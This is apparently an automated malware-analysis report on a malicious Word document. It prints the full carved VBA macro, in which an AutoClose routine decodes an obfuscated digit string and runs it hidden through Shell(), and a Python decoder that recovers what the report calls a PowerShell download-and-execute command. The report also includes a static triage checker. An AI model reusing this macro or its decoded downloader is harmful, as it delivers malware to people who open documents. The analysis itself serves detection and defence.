Verdict: MALICIOUS (risk score 244)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is an OOXML Word document whose word/vbaProject.bin stream carries VBA macros. An AutoClose procedure, which Word runs automatically when the document is closed (so after the user has already opened it and enabled macros), reaches Shell() indirectly through Application.Run. The command string never appears in clear text: it is rebuilt at run time from a long decimal string by taking two digits at a time as an index into a fixed 59-character table. This indicates an attempt to execute arbitrary commands, most likely to download and run a secondary payload. ClamAV detects the file as Doc.Malware.Emooodldr-6711604-0; the signature fires on the compressed VBA project, while the decoded macro source carved from it is not itself signed (see the extracted artifacts).
Heuristics (6)
- ClamAV: Doc.Malware.Emooodldr-6711604-0 [critical; CLAMAV_DETECTION]. ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0.
- VBA project inside OOXML [medium; OOXML_VBA; 2 related findings]. Document contains a VBA project (VBA macros present).
- Shell() call in VBA [critical; OLE_VBA_SHELL]. The macro calls Shell() with a window style of 0 (vbHide), so whatever it launches runs without a visible window.
- Auto_Close macro [high; OLE_VBA_AUTOCLOSE]. The auto-run procedure in this sample is spelled AutoClose, the Word form of the name (Auto_Close is the Excel spelling); it runs when the document is closed.
- Suspicious extracted artifact [info; EXTRACTED_FILE_STATIC_TRIAGE]. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info; EMBEDDED_URL]. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs found, all in document text (OOXML body / shared strings):
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2006/wordml
  All six are XML namespace URIs that appear in every Word OOXML package and carry no indicator value. Any address the macro actually contacts sits inside the encoded string handed to Shell(), which a plain URL extractor cannot see until the string is decoded.
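The OOXML_VBA, OLE_VBA_AUTOCLOSE, OLE_VBA_SHELL and EXTRACTED_FILE_STATIC_TRIAGE findings above are cheap static checks over decoded VBA source. The following Python is an added example, not the analyzer's own code, showing how such checks can be written so that they recognise both the Word and Excel spellings of the auto-run names and say what a long alphanumeric run really is (decimal, hex, or base64-like) instead of reporting every such run as "base64-like". The rule names (`shell_call`, `application_run`, ...) are this example's own, and `SAMPLE_VBA` is a constructed, cut-down copy of the macros.bas shown later in this report with the digit string shortened.

```python
import re

# Auto-run procedure names.  Word uses the un-underscored forms (AutoExec, AutoOpen,
# AutoClose, ...); Excel uses Auto_Open / Auto_Close; the Document_* / Workbook_*
# event handlers fire without any user action as well.
AUTOEXEC_NAMES = {
    "autoexec", "autoopen", "autoclose", "autonew", "autoexit",
    "auto_open", "auto_close", "document_open", "document_close",
    "workbook_open", "workbook_close",
}

# Execution primitives.  Rule names are this example's own, not the analyzer's.
EXEC_PATTERNS = {
    "shell_call": re.compile(r"(?<![\w.])Shell\b", re.I),     # bare Shell statement/function
    "wscript_shell": re.compile(r"WScript\.Shell", re.I),
    "create_object": re.compile(r"\bCreateObject\s*\(", re.I),
    "application_run": re.compile(r"\bApplication\.Run\b", re.I),
}

PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.M | re.I)
BLOB_RE = re.compile(r"[A-Za-z0-9+/=]{100,}")   # any long run from the base64 alphabet


def classify_blob(blob: str) -> str:
    """Say what a long alphanumeric run really is before calling it base64."""
    if blob.isdigit():
        return "decimal"
    if re.fullmatch(r"[0-9A-Fa-f]+", blob):
        return "hex"
    return "base64-like"


def triage_vba(source: str) -> dict:
    """Static checks over decoded VBA source; returns only the findings that fired."""
    findings = {}
    procs = PROC_RE.findall(source)
    auto = [p for p in procs if p.lower() in AUTOEXEC_NAMES]
    if auto:
        findings["autoexec"] = auto
    for name, pat in EXEC_PATTERNS.items():
        hits = len(pat.findall(source))
        if hits:
            findings[name] = hits
    blobs = [(classify_blob(b), len(b)) for b in BLOB_RE.findall(source)]
    if blobs:
        findings["long_blobs"] = blobs
    return findings


def verdict(findings: dict) -> str:
    """Auto-run plus an execution primitive is the combination that matters most."""
    execs = {"shell_call", "wscript_shell", "create_object"}
    if "autoexec" in findings and execs & set(findings):
        return "critical"
    if "autoexec" in findings or execs & set(findings):
        return "high"
    if findings:
        return "medium"
    return "clean"


# Constructed sample: a cut-down copy of the macros.bas shown later in this report,
# with the encoded argument replaced by a shorter repeating digit string.
BLOB = "1715415546514640021740" * 6    # 132 digits
SAMPLE_VBA = f'''Attribute VB_Name = "ThisDocument"
Public Function rischio(scippo As String)
    Shell scippo, 0
End Function
Sub AutoClose()
    Call Application.Run("rischio", delirio("{BLOB}"))
End Sub
'''

if __name__ == "__main__":
    result = triage_vba(SAMPLE_VBA)
    print(result)
    print("verdict:", verdict(result))
```

The Application.Run indirection in the sample does not help the author here: Shell is still a literal token in the source, and the auto-run name is still a declared procedure, so both rules fire on the decoded text. Checks like these only work on decompressed source (what olevba produces), never on the raw vbaProject.bin stream.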
Extracted artifacts (2)
Files carved from inside the sample during analysis.

Artifact: macros.bas
- Kind: vba-macro
- Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
- Size: 2461 bytes
- SHA-256: 2df131f4297a1ec572b7bb77b0fe56aa20f230431f61f655c4c4cf23b57a2188
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob. The blob matched the base64 alphabet only because it is a run of decimal digits; it is not base64 and will not decode as such. It is the argument to the macro's own two-digit substitution decoder, shown in the preview.
Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Substitution table: returns the character stored at index `serio` (0 to 58).
' An index outside the table leaves the result as the empty string.
Public Function critico(serio As Integer) As String
    Dim rullino() As Variant
    rullino = Array(",", "l", "/", "$", "T", "W", "'", "1", "O", "D", "a", ":", "4", "n", "g", "m", "w", "c", "3", "?", "K", "C", "2", "N", "J", "-", ")", "\", "p", "8", "F", "i", "s", "S", ";", "r", "B", "u", "X", "v", " ", "d", "t", "o", "j", "y", "e", "E", "(", "P", "A", "x", "I", "=", "+", ".", "f", "h", "b")
    Dim sfoderare As Integer
    For sfoderare = LBound(rullino) To UBound(rullino)
        If sfoderare = serio Then
            critico = rullino(sfoderare)
        End If
    Next
End Function

' Splits a string into an array of single characters: StrConv to vbUnicode
' interleaves a NUL after every character, Split then cuts on those NULs, and
' Left(..., Len - 1) drops the trailing NUL first.
Function chirurgo(monotono As String)
    monotono = StrConv(monotono, vbUnicode)
    chirurgo = Split(Left(monotono, Len(monotono) - 1), vbNullChar)
End Function

' Decoder: walks the digit string two characters at a time, converts each pair
' with Int() and maps it through critico(). `sfoderare` is never declared in
' this procedure (no Option Explicit), so it is an implicit Variant; `inter` is
' declared but unused. A trailing odd digit is skipped by the UBound guard.
Function delirio(nordico As String) As String
    Dim inter As Integer
    Dim parola As String
    Dim berlina As Variant
    berlina = chirurgo(Trim(nordico))
    For sfoderare = 0 To Len(nordico)
        If (sfoderare + 1) <= UBound(berlina) Then
            Dim malinteso As String
            malinteso = berlina(sfoderare)
            sfoderare = sfoderare + 1
            malinteso = malinteso + berlina(sfoderare)
            parola = parola + critico(Int(malinteso))
        End If
    Next
    delirio = parola
End Function

' Runs the decoded command line with window style 0 (vbHide), i.e. no window.
Public Function rischio(scippo As String)
    Shell scippo, 0
End Function

' Word auto-run entry point: fires when the document is closed. Shell() is
' reached through Application.Run by procedure name rather than called directly.
Sub AutoClose()
    Call Application.Run("rischio", delirio("171541554651464002174028431646353257460101402547514617403645281032324025234349402521431515101341404823461625085844461742403345324246155523464255054658210131461342265509431613014310413031014648065742422811020210101341464614131046101345551743150213311343023237284635565515415606004003461339115049490950045040544006273620412455465146062634403342103542254935431746323240034613391150494909500450062736204124554651460634404823461625085844461742403345324246155523464255054658210131461342265509431613014310413342353113144806574242281102021010134146461413104610134555174315023255285728193141533237284635560626344052473848482346162508584446174240334532424615552346425505465821013146134226550943161301431041334235311314480657424228110202180755072912552218125507122902325528572806262634"))
End Sub
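The numeric argument in the AutoClose procedure above is not base64: the macro consumes it two digits at a time and uses each two-digit value as an index into the 59-entry `rullino` table. The following Python is an added example, not code from the report, the analyzer, or the sample, that re-implements `critico`, `chirurgo` and `delirio` faithfully (including `Int()`'s handling of leading zeros, the space-only `Trim()`, and the dropped trailing odd digit), runs the decoder over the string copied verbatim from the `Application.Run` call, and then pulls URLs, IPv4 literals and the `$env:APPDATA` drop path out of the result. The `extract_iocs` helper and its regular expressions are this example's own and are not part of the analyzer.

```python
import re

# 59-entry substitution table, copied from the `rullino` array in the macro above.
RULLINO = [
    ",", "l", "/", "$", "T", "W", "'", "1", "O", "D",
    "a", ":", "4", "n", "g", "m", "w", "c", "3", "?",
    "K", "C", "2", "N", "J", "-", ")", "\\", "p", "8",
    "F", "i", "s", "S", ";", "r", "B", "u", "X", "v",
    " ", "d", "t", "o", "j", "y", "e", "E", "(", "P",
    "A", "x", "I", "=", "+", ".", "f", "h", "b",
]

# Copied verbatim from the delirio("...") argument in the AutoClose procedure above.
ENCODED = "171541554651464002174028431646353257460101402547514617403645281032324025234349402521431515101341404823461625085844461742403345324246155523464255054658210131461342265509431613014310413031014648065742422811020210101341464614131046101345551743150213311343023237284635565515415606004003461339115049490950045040544006273620412455465146062634403342103542254935431746323240034613391150494909500450062736204124554651460634404823461625085844461742403345324246155523464255054658210131461342265509431613014310413342353113144806574242281102021010134146461413104610134555174315023255285728193141533237284635560626344052473848482346162508584446174240334532424615552346425505465821013146134226550943161301431041334235311314480657424228110202180755072912552218125507122902325528572806262634"


def critico(serio: int) -> str:
    """VBA critico(): the table entry at index `serio`; an out-of-range index gives ''."""
    return RULLINO[serio] if 0 <= serio < len(RULLINO) else ""


def chirurgo(monotono: str) -> list:
    """VBA chirurgo(): split a string into single characters.  The macro does this
    with StrConv(..., vbUnicode) + Split(vbNullChar); Python can just list() it."""
    return list(monotono)


def delirio(nordico: str) -> str:
    """VBA delirio(): walk the trimmed string two characters at a time, convert each
    pair with Int() (so '01' -> 1) and map it through critico().  A trailing odd
    character is dropped, exactly as the VBA (i + 1) <= UBound() guard drops it."""
    berlina = chirurgo(nordico.strip(" "))      # VBA Trim() strips spaces only
    parola = []
    for i in range(0, len(berlina) - 1, 2):
        malinteso = berlina[i] + berlina[i + 1]
        if not malinteso.isdigit():
            # VBA Int() on a non-numeric string raises a type-mismatch error; do the same
            raise ValueError(f"non-numeric pair {malinteso!r} at offset {i}")
        parola.append(critico(int(malinteso)))
    return "".join(parola)


def extract_iocs(command: str) -> dict:
    """Pull URLs, IPv4 literals and $env:APPDATA drop paths out of a decoded command.
    Example-specific helper; the patterns are deliberately loose."""
    urls = re.findall(r"https?://[^\s'\"()]+", command)
    ips = sorted(set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", command)))
    drops = re.findall(r"\$env:APPDATA\s*\+?\s*'(\\[^']+)'", command)
    return {"urls": urls, "ips": ips, "drop_paths": sorted(set(drops))}


if __name__ == "__main__":
    decoded = delirio(ENCODED)
    print(decoded)
    for key, values in extract_iocs(decoded).items():
        print(f"{key}: {values}")
```

Run stand-alone, the script prints a cmd.exe /c powershell one-liner built from System.Net.WebClient DownloadFile and DownloadString calls, Start-Process and IEX; that decoded line, not the schema namespace URIs listed under Embedded URL, is where the network and file-system indicators for this sample come from. The decoder raises on a non-digit pair rather than skipping it, because VBA's Int() would fail there with a type mismatch and the real macro would never reach Shell().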
Artifact: vbaProject_00.bin
- Kind: vba-project
- Source: OOXML VBA project: word/vbaProject.bin
- Size: 11776 bytes
- SHA-256: e2410f65041192ecc581e34489054297f43981758fe2738868184e0bbddc349d
- ClamAV: Doc.Malware.Emooodldr-6711604-0 (this compressed VBA project is the object the file-level signature fires on; olevba's decompression of it is what yields the macros.bas source above)
- Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob.